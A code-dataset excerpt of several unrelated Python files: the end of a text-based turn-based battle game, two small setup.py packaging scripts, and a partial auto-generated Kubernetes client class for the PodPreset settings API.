for i in range(len(playerClasses)):
print '[' + str(i)+ ']:' + ' ' + playerClasses[i]
try:
playerClassChoice = int(raw_input('>'))
if playerClassChoice >= 0 and playerClassChoice <= len(playerClasses):
break
else:
raise ValueError
except ValueError: # incorrect input
print 'Incorrect Choice! Please Try again!'
thePlayer = Player(playerClasses[playerClassChoice]) # init player
thePlayer.printInfo()
print 'How many enemies do you want to fight?'
    while True: # used to pick the number of enemies
try:
enemyCount = int(raw_input('>'))
break
except ValueError:
continue
    frontRowCount = (enemyCount / 2) + 1 # there are always more front-row enemies than back-row enemies
backRowCount = enemyCount - frontRowCount
functions.endofLine()
print 'Picking Enemies!'
functions.endofLine()
frontRow = [] # init front and back rows
backRow = []
for i in range(frontRowCount): # randomly pick front row enemies
tempEnemyIndex = randint(0,len(frontRowPossibilities)-1)
frontRow.append(Enemy(frontRowPossibilities[tempEnemyIndex],i))
for i in range(backRowCount): # randomly pick back row enemies
tempEnemyIndex = randint(0,len(backRowPossibilities)-1)
backRow.append(Enemy(backRowPossibilities[tempEnemyIndex],i+len(frontRow)))
    initState = States('Attack!') # initialize the enemy FSM
allEnemies = Enemies(frontRow,backRow,initState) # create enemy team object
sys.stdout.write('Starting Game!')
functions.endofLine()
command = ''
functions.endofLine()
while command.lower() not in exitStrings:
if len(allEnemies.getAllEnemies()) <= 0: # winning condition
print 'YOU WIN!'
            break
elif thePlayer.currentHP <= 0: # losing condition
print 'YOU LOST!'
            break
wait = getpass.getpass('press enter key to continue...') # pauses game
functions.clearScreen()
        thePlayer = functions.resetPlayer(thePlayer) # remove buffs and such from the player
functions.endofLine()
allEnemies.printEnemies()
functions.endofLine()
thePlayer.printInfoLine()
functions.endofLine()
print 'Commands!'
for i in range(len(commandPossibilities)): # print possible player commands
print '[' + str(i) + '] ' + commandPossibilities[i]
try:
command = int(raw_input('>')) # pick command
if command >= len(commandPossibilities) or command < 0:
raise ValueError
except ValueError: # error checking
functions.tryAgain()
continue
functions.clearScreen()
command = commandPossibilities[command]
if command == 'Attack': # attack command
print 'Attack Who?'
for x in allEnemies.getAllEnemies(): # get target to attack
print '[' + str(x.enemyId) + '] ' + x.enemyType
try:
enemyToAttackID = int(raw_input('>'))
if not allEnemies.validId(enemyToAttackID):
raise ValueError
except ValueError: # error checking
functions.tryAgain()
continue
enemyToAttack = allEnemies.getEnemey(enemyToAttackID)
thePlayer,allEnemies= functions.Attack(thePlayer,enemyToAttack,allEnemies,True)
if command == 'Defend': # defend command
thePlayer = functions.Defend(thePlayer,True)
print 'You are Defending!'
print 'current Stats:'
thePlayer.printInfo('--> ')
if command == 'Save': # save game using pickle
functions.saveGame(allEnemies,thePlayer) # save the current game
break
        if command.lower() not in exitStrings: # make sure the user did not exit
            allEnemies.resetEnemies() # reset enemies (remove defence and attack buffs)
            allEnemies.removeDeadEnemeies() # remove the dead enemies
functions.endofLine()
functions.endofLine()
thePlayer,allEnemies = functions.enemyTurn(thePlayer,allEnemies) # take the enemy turn
functions.endofLine()
if __name__ == "__main__":
runGame() # run the game
|
FireElementalNE/AI-Final-Project
|
src/game.py
|
Python
|
apache-2.0
| 5,609
|
from __future__ import unicode_literals
import re
from setuptools import find_packages, setup
def get_version(filename):
content = open(filename).read()
metadata = dict(re.findall("__([a-z]+)__ = '([^']+)'", content))
return metadata['version']
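# Editorial example: given a v2gcalendar/__init__.py containing
#     __version__ = '1.0'
# the regex in get_version() produces {'version': '1.0'} and returns '1.0'.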
setup(
name='v2gcalendar',
version=get_version('v2gcalendar/__init__.py'),
url='http://github.com/felixb/v2gcalendar/',
license='Apache License, Version 2.0',
author='Felix Bechstein',
author_email='f@ub0r.de',
description='Upload vcalendar files to your Google calendar',
long_description=open('README.rst').read(),
packages=find_packages(exclude=['tests', 'tests.*']),
zip_safe=False,
include_package_data=True,
install_requires=[
'setuptools',
'icalendar',
'google-api-python-client'
],
entry_points={
'console_scripts': [
'v2gcalendar = v2gcalendar.main:main'
]
},
test_suite='nose.collector',
tests_require=[
'nose',
'mock >= 1.0',
],
)
|
felixb/v2gcalendar
|
setup.py
|
Python
|
apache-2.0
| 1,044
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import find_packages, setup
setup(name='cardisco',
version='1.0',
description='HTML Autodiscovery Library',
author='Mark Lee',
packages=find_packages(),
install_requires=[
'html5lib',
'httplib2',
])
|
devhub/cardisco
|
setup.py
|
Python
|
apache-2.0
| 319
|
# coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.6.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class SettingsV1alpha1Api(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def create_namespaced_pod_preset(self, namespace, body, **kwargs):
"""
create a PodPreset
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_namespaced_pod_preset(namespace, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1alpha1PodPreset body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1PodPreset
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_namespaced_pod_preset_with_http_info(namespace, body, **kwargs)
else:
(data) = self.create_namespaced_pod_preset_with_http_info(namespace, body, **kwargs)
return data
def create_namespaced_pod_preset_with_http_info(self, namespace, body, **kwargs):
"""
create a PodPreset
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_namespaced_pod_preset_with_http_info(namespace, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1alpha1PodPreset body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1PodPreset
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', 'body', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_namespaced_pod_preset" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `create_namespaced_pod_preset`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_namespaced_pod_preset`")
collection_formats = {}
resource_path = '/apis/settings.k8s.io/v1alpha1/namespaces/{namespace}/podpresets'.replace('{format}', 'json')
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1PodPreset',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
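    # Illustrative usage sketch, not generated code: creating a PodPreset via
    # the synchronous wrapper above. The preset name, namespace, selector and
    # env var are hypothetical; V1alpha1PodPreset, V1alpha1PodPresetSpec,
    # V1ObjectMeta, V1LabelSelector and V1EnvVar are models shipped alongside
    # this client.
    #
    #   from kubernetes import client, config
    #   config.load_kube_config()
    #   api = client.SettingsV1alpha1Api()
    #   preset = client.V1alpha1PodPreset(
    #       metadata=client.V1ObjectMeta(name="demo-preset"),
    #       spec=client.V1alpha1PodPresetSpec(
    #           selector=client.V1LabelSelector(match_labels={"role": "demo"}),
    #           env=[client.V1EnvVar(name="DEMO_ENV", value="enabled")]))
    #   created = api.create_namespaced_pod_preset("default", preset)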
def delete_collection_namespaced_pod_preset(self, namespace, **kwargs):
"""
delete collection of PodPreset
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_collection_namespaced_pod_preset(namespace, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1Status
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_collection_namespaced_pod_preset_with_http_info(namespace, **kwargs)
else:
(data) = self.delete_collection_namespaced_pod_preset_with_http_info(namespace, **kwargs)
return data
def delete_collection_namespaced_pod_preset_with_http_info(self, namespace, **kwargs):
"""
delete collection of PodPreset
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_collection_namespaced_pod_preset_with_http_info(namespace, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1Status
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', 'pretty', 'field_selector', 'label_selector', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_collection_namespaced_pod_preset" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `delete_collection_namespaced_pod_preset`")
collection_formats = {}
resource_path = '/apis/settings.k8s.io/v1alpha1/namespaces/{namespace}/podpresets'.replace('{format}', 'json')
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'field_selector' in params:
query_params['fieldSelector'] = params['field_selector']
if 'label_selector' in params:
query_params['labelSelector'] = params['label_selector']
if 'resource_version' in params:
query_params['resourceVersion'] = params['resource_version']
if 'timeout_seconds' in params:
query_params['timeoutSeconds'] = params['timeout_seconds']
if 'watch' in params:
query_params['watch'] = params['watch']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Status',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
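    # Illustrative sketch: deleting every PodPreset in a namespace that
    # matches a label, via the label_selector kwarg documented above (the
    # selector value is hypothetical).
    #
    #   status = api.delete_collection_namespaced_pod_preset(
    #       "default", label_selector="role=demo")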
def delete_namespaced_pod_preset(self, name, namespace, body, **kwargs):
"""
delete a PodPreset
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_namespaced_pod_preset(name, namespace, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the PodPreset (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1DeleteOptions body: (required)
:param str pretty: If 'true', then the output is pretty printed.
        :param int grace_period_seconds: The duration in seconds before the object should be deleted. The value must be a non-negative integer; zero means delete immediately. If this value is nil, the default grace period for the specified type will be used.
        :param bool orphan_dependents: Deprecated: please use PropagationPolicy; this field will be deprecated in 1.7. Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list. Either this field or PropagationPolicy may be set, but not both.
:param str propagation_policy: Whether and how garbage collection will be performed. Either this field or OrphanDependents may be set, but not both. The default policy is decided by the existing finalizer set in the metadata.finalizers and the resource-specific default policy.
:return: V1Status
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_namespaced_pod_preset_with_http_info(name, namespace, body, **kwargs)
else:
(data) = self.delete_namespaced_pod_preset_with_http_info(name, namespace, body, **kwargs)
return data
def delete_namespaced_pod_preset_with_http_info(self, name, namespace, body, **kwargs):
"""
delete a PodPreset
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_namespaced_pod_preset_with_http_info(name, namespace, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the PodPreset (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1DeleteOptions body: (required)
:param str pretty: If 'true', then the output is pretty printed.
        :param int grace_period_seconds: The duration in seconds before the object should be deleted. The value must be a non-negative integer; zero means delete immediately. If this value is nil, the default grace period for the specified type will be used.
        :param bool orphan_dependents: Deprecated: please use PropagationPolicy; this field will be deprecated in 1.7. Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list. Either this field or PropagationPolicy may be set, but not both.
:param str propagation_policy: Whether and how garbage collection will be performed. Either this field or OrphanDependents may be set, but not both. The default policy is decided by the existing finalizer set in the metadata.finalizers and the resource-specific default policy.
:return: V1Status
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'body', 'pretty', 'grace_period_seconds', 'orphan_dependents', 'propagation_policy']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_namespaced_pod_preset" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `delete_namespaced_pod_preset`")
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `delete_namespaced_pod_preset`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `delete_namespaced_pod_preset`")
collection_formats = {}
resource_path = '/apis/settings.k8s.io/v1alpha1/namespaces/{namespace}/podpresets/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'grace_period_seconds' in params:
query_params['gracePeriodSeconds'] = params['grace_period_seconds']
if 'orphan_dependents' in params:
query_params['orphanDependents'] = params['orphan_dependents']
if 'propagation_policy' in params:
query_params['propagationPolicy'] = params['propagation_policy']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Status',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
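    # Illustrative sketch: deleting one PodPreset. This endpoint requires a
    # V1DeleteOptions body; the propagation_policy kwarg documented above
    # controls garbage collection (names hypothetical).
    #
    #   status = api.delete_namespaced_pod_preset(
    #       "demo-preset", "default", client.V1DeleteOptions(),
    #       propagation_policy="Foreground")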
def get_api_resources(self, **kwargs):
"""
get available resources
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_api_resources(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: V1APIResourceList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_api_resources_with_http_info(**kwargs)
else:
(data) = self.get_api_resources_with_http_info(**kwargs)
return data
def get_api_resources_with_http_info(self, **kwargs):
"""
get available resources
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_api_resources_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: V1APIResourceList
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_api_resources" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/apis/settings.k8s.io/v1alpha1/'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1APIResourceList',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
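    # Illustrative sketch: discovering what this API group serves. The
    # returned V1APIResourceList carries one V1APIResource per resource.
    #
    #   resources = api.get_api_resources()
    #   for r in resources.resources:
    #       print(r.name, r.namespaced)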
def list_namespaced_pod_preset(self, namespace, **kwargs):
"""
list or watch objects of kind PodPreset
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_namespaced_pod_preset(namespace, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1alpha1PodPresetList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_namespaced_pod_preset_with_http_info(namespace, **kwargs)
else:
(data) = self.list_namespaced_pod_preset_with_http_info(namespace, **kwargs)
return data
def list_namespaced_pod_preset_with_http_info(self, namespace, **kwargs):
"""
list or watch objects of kind PodPreset
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_namespaced_pod_preset_with_http_info(namespace, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1alpha1PodPresetList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', 'pretty', 'field_selector', 'label_selector', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_namespaced_pod_preset" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `list_namespaced_pod_preset`")
collection_formats = {}
resource_path = '/apis/settings.k8s.io/v1alpha1/namespaces/{namespace}/podpresets'.replace('{format}', 'json')
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'field_selector' in params:
query_params['fieldSelector'] = params['field_selector']
if 'label_selector' in params:
query_params['labelSelector'] = params['label_selector']
if 'resource_version' in params:
query_params['resourceVersion'] = params['resource_version']
if 'timeout_seconds' in params:
query_params['timeoutSeconds'] = params['timeout_seconds']
if 'watch' in params:
query_params['watch'] = params['watch']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1PodPresetList',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
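    # Illustrative sketch: the list endpoint doubles as a watch. Assuming the
    # package's watch helper is available (as in the upstream client), changes
    # stream in as dicts with "type" and "object" keys:
    #
    #   from kubernetes import watch
    #   w = watch.Watch()
    #   for event in w.stream(api.list_namespaced_pod_preset, "default",
    #                         timeout_seconds=10):
    #       print(event["type"], event["object"].metadata.name)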
def list_pod_preset_for_all_namespaces(self, **kwargs):
"""
list or watch objects of kind PodPreset
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_pod_preset_for_all_namespaces(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1alpha1PodPresetList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_pod_preset_for_all_namespaces_with_http_info(**kwargs)
else:
(data) = self.list_pod_preset_for_all_namespaces_with_http_info(**kwargs)
return data
def list_pod_preset_for_all_namespaces_with_http_info(self, **kwargs):
"""
list or watch objects of kind PodPreset
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_pod_preset_for_all_namespaces_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1alpha1PodPresetList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['field_selector', 'label_selector', 'pretty', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_pod_preset_for_all_namespaces" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/apis/settings.k8s.io/v1alpha1/podpresets'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'field_selector' in params:
query_params['fieldSelector'] = params['field_selector']
if 'label_selector' in params:
query_params['labelSelector'] = params['label_selector']
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'resource_version' in params:
query_params['resourceVersion'] = params['resource_version']
if 'timeout_seconds' in params:
query_params['timeoutSeconds'] = params['timeout_seconds']
if 'watch' in params:
query_params['watch'] = params['watch']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1PodPresetList',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
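    # Illustrative sketch: listing presets across every namespace, narrowed by
    # a (hypothetical) label selector; results arrive on the .items attribute.
    #
    #   presets = api.list_pod_preset_for_all_namespaces(
    #       label_selector="role=demo")
    #   names = [p.metadata.name for p in presets.items]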
def patch_namespaced_pod_preset(self, name, namespace, body, **kwargs):
"""
partially update the specified PodPreset
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
